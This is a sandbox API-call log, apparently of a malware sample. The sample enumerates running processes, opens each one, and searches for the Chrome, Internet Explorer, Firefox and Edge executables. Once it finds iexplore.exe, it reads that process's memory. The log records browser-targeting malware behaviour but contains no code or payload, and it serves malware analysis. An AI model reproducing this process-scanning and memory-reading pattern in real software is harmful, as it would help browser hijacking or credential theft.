	[0230.550] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0230.550] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0230.551] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x54c) returned 0x6824
	[0230.551] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.551] StrStrIA (lpFirst="taskhost.exe", lpSrch="chrome.exe") returned 0x0
	[0230.551] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.551] StrStrIA (lpFirst="taskhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0230.551] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.552] StrStrIA (lpFirst="taskhost.exe", lpSrch="firefox.exe") returned 0x0
	[0230.552] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.552] StrStrIA (lpFirst="taskhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0230.552] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x34c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0230.554] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x590) returned 0x6828
	[0230.554] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.554] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0230.554] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.554] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0230.555] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.555] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0230.555] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.555] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0230.555] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0230.556] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xf0) returned 0x682c
	[0230.556] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.556] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0230.557] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.557] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0230.557] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.557] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0230.557] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.557] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0230.557] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x270, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0230.558] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x270) returned 0x6830
	[0230.558] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.558] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0230.559] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.559] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0230.559] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.559] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
	[0230.559] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.559] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0230.560] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x500, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1
	[0230.560] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x500) returned 0x6834
	[0230.560] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.560] StrStrIA (lpFirst="sppsvc.exe", lpSrch="chrome.exe") returned 0x0
	[0230.561] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.561] StrStrIA (lpFirst="sppsvc.exe", lpSrch="iexplore.exe") returned 0x0
	[0230.561] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.561] StrStrIA (lpFirst="sppsvc.exe", lpSrch="firefox.exe") returned 0x0
	[0230.561] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.561] StrStrIA (lpFirst="sppsvc.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0230.562] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x324, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1
	[0230.562] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x7b8) returned 0x6838
	[0230.562] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.562] StrStrIA (lpFirst="dwm.exe", lpSrch="chrome.exe") returned 0x0
	[0230.563] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.563] StrStrIA (lpFirst="dwm.exe", lpSrch="iexplore.exe") returned 0x0
	[0230.563] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.563] StrStrIA (lpFirst="dwm.exe", lpSrch="firefox.exe") returned 0x0
	[0230.563] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.563] StrStrIA (lpFirst="dwm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0230.563] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x394, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1
	[0230.564] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x61c) returned 0x683c
	[0230.564] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.564] StrStrIA (lpFirst="explorer.exe", lpSrch="chrome.exe") returned 0x0
	[0230.565] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.565] StrStrIA (lpFirst="explorer.exe", lpSrch="iexplore.exe") returned 0x0
	[0230.565] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.565] StrStrIA (lpFirst="explorer.exe", lpSrch="firefox.exe") returned 0x0
	[0230.565] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.565] StrStrIA (lpFirst="explorer.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0230.565] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1
	[0230.566] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x62c) returned 0x0
	[0230.566] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="shirts_cumshots_compaq.exe")) returned 1
	[0230.567] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa78) returned 0x6840
	[0230.567] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.567] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="chrome.exe") returned 0x0
	[0230.568] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.568] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="iexplore.exe") returned 0x0
	[0230.568] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.568] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="firefox.exe") returned 0x0
	[0230.569] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.569] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0230.570] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="league.exe")) returned 1
	[0230.570] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa9c) returned 0x6844
	[0230.570] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.570] StrStrIA (lpFirst="league.exe", lpSrch="chrome.exe") returned 0x0
	[0230.571] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.571] StrStrIA (lpFirst="league.exe", lpSrch="iexplore.exe") returned 0x0
	[0230.571] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.571] StrStrIA (lpFirst="league.exe", lpSrch="firefox.exe") returned 0x0
	[0230.571] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.571] StrStrIA (lpFirst="league.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0230.572] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="js_sound.exe")) returned 1
	[0230.572] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaac) returned 0x6848
	[0230.572] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.572] StrStrIA (lpFirst="js_sound.exe", lpSrch="chrome.exe") returned 0x0
	[0230.573] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.573] StrStrIA (lpFirst="js_sound.exe", lpSrch="iexplore.exe") returned 0x0
	[0230.573] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.573] StrStrIA (lpFirst="js_sound.exe", lpSrch="firefox.exe") returned 0x0
	[0230.573] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.573] StrStrIA (lpFirst="js_sound.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0230.574] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xac0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beast-dry.exe")) returned 1
	[0230.574] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xac0) returned 0x684c
	[0230.574] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.575] StrStrIA (lpFirst="beast-dry.exe", lpSrch="chrome.exe") returned 0x0
	[0230.575] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.575] StrStrIA (lpFirst="beast-dry.exe", lpSrch="iexplore.exe") returned 0x0
	[0230.575] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.576] StrStrIA (lpFirst="beast-dry.exe", lpSrch="firefox.exe") returned 0x0
	[0230.576] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.576] StrStrIA (lpFirst="beast-dry.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0230.576] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xad0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="forecastsgeographic.exe")) returned 1
	[0230.577] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xad0) returned 0x6850
	[0230.577] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.577] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="chrome.exe") returned 0x0
	[0230.578] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.578] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="iexplore.exe") returned 0x0
	[0230.578] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.578] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="firefox.exe") returned 0x0
	[0230.579] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.579] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0230.579] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xae0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reno.exe")) returned 1
	[0230.580] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xae0) returned 0x6854
	[0230.580] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.580] StrStrIA (lpFirst="reno.exe", lpSrch="chrome.exe") returned 0x0
	[0230.580] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.580] StrStrIA (lpFirst="reno.exe", lpSrch="iexplore.exe") returned 0x0
	[0230.580] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.581] StrStrIA (lpFirst="reno.exe", lpSrch="firefox.exe") returned 0x0
	[0230.581] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.581] StrStrIA (lpFirst="reno.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0230.581] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="specreformwear.exe")) returned 1
	[0230.582] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaf0) returned 0x6858
	[0230.582] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.582] StrStrIA (lpFirst="specreformwear.exe", lpSrch="chrome.exe") returned 0x0
	[0230.582] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.582] StrStrIA (lpFirst="specreformwear.exe", lpSrch="iexplore.exe") returned 0x0
	[0230.583] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.583] StrStrIA (lpFirst="specreformwear.exe", lpSrch="firefox.exe") returned 0x0
	[0230.583] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.583] StrStrIA (lpFirst="specreformwear.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0230.584] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="rr_publications.exe")) returned 1
	[0230.585] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb00) returned 0x685c
	[0230.585] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.585] StrStrIA (lpFirst="rr_publications.exe", lpSrch="chrome.exe") returned 0x0
	[0230.586] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.586] StrStrIA (lpFirst="rr_publications.exe", lpSrch="iexplore.exe") returned 0x0
	[0230.586] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.586] StrStrIA (lpFirst="rr_publications.exe", lpSrch="firefox.exe") returned 0x0
	[0230.587] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.587] StrStrIA (lpFirst="rr_publications.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0230.587] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="solo.exe")) returned 1
	[0230.588] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb10) returned 0x6860
	[0230.588] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.588] StrStrIA (lpFirst="solo.exe", lpSrch="chrome.exe") returned 0x0
	[0230.588] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.588] StrStrIA (lpFirst="solo.exe", lpSrch="iexplore.exe") returned 0x0
	[0230.589] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.589] StrStrIA (lpFirst="solo.exe", lpSrch="firefox.exe") returned 0x0
	[0230.589] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.589] StrStrIA (lpFirst="solo.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0230.589] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beam.exe")) returned 1
	[0230.590] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb20) returned 0x6864
	[0230.590] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.590] StrStrIA (lpFirst="beam.exe", lpSrch="chrome.exe") returned 0x0
	[0230.590] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.590] StrStrIA (lpFirst="beam.exe", lpSrch="iexplore.exe") returned 0x0
	[0230.590] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.590] StrStrIA (lpFirst="beam.exe", lpSrch="firefox.exe") returned 0x0
	[0230.591] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.591] StrStrIA (lpFirst="beam.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0230.591] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="configurations.exe")) returned 1
	[0230.592] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb30) returned 0x6868
	[0230.592] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.592] StrStrIA (lpFirst="configurations.exe", lpSrch="chrome.exe") returned 0x0
	[0230.592] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.592] StrStrIA (lpFirst="configurations.exe", lpSrch="iexplore.exe") returned 0x0
	[0230.593] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.593] StrStrIA (lpFirst="configurations.exe", lpSrch="firefox.exe") returned 0x0
	[0230.593] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.593] StrStrIA (lpFirst="configurations.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0230.594] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="fact-film-anticipated.exe")) returned 1
	[0230.594] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb40) returned 0x686c
	[0230.595] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.595] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="chrome.exe") returned 0x0
	[0230.595] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.595] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="iexplore.exe") returned 0x0
	[0230.596] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.596] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="firefox.exe") returned 0x0
	[0230.596] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.596] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0230.597] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wanting villages.exe")) returned 1
	[0230.598] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb50) returned 0x6870
	[0230.598] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.598] StrStrIA (lpFirst="wanting villages.exe", lpSrch="chrome.exe") returned 0x0
	[0230.598] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.598] StrStrIA (lpFirst="wanting villages.exe", lpSrch="iexplore.exe") returned 0x0
	[0230.599] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.599] StrStrIA (lpFirst="wanting villages.exe", lpSrch="firefox.exe") returned 0x0
	[0230.599] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.599] StrStrIA (lpFirst="wanting villages.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0230.600] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="engagementresearchersmonkey.exe")) returned 1
	[0230.601] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb60) returned 0x6874
	[0230.601] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.601] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="chrome.exe") returned 0x0
	[0230.602] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.602] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="iexplore.exe") returned 0x0
	[0230.602] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.602] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="firefox.exe") returned 0x0
	[0230.603] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.603] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0230.603] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="surgical-marcus.exe")) returned 1
	[0230.604] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb70) returned 0x6878
	[0230.604] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.604] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="chrome.exe") returned 0x0
	[0230.605] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.605] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="iexplore.exe") returned 0x0
	[0230.605] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.605] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="firefox.exe") returned 0x0
	[0230.606] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.606] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0230.606] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0230.607] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc38) returned 0x687c
	[0230.607] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.607] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0230.607] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.607] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0230.608] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.608] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0230.608] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.608] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0230.608] NtQueryInformationProcess (in: ProcessHandle=0x687c, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0230.608] ReadProcessMemory (in: hProcess=0x687c, lpBaseAddress=0x7ffdb000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0230.609] ReadProcessMemory (in: hProcess=0x687c, lpBaseAddress=0x2b11c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0230.609] ReadProcessMemory (in: hProcess=0x687c, lpBaseAddress=0x2b1998, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0230.609] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
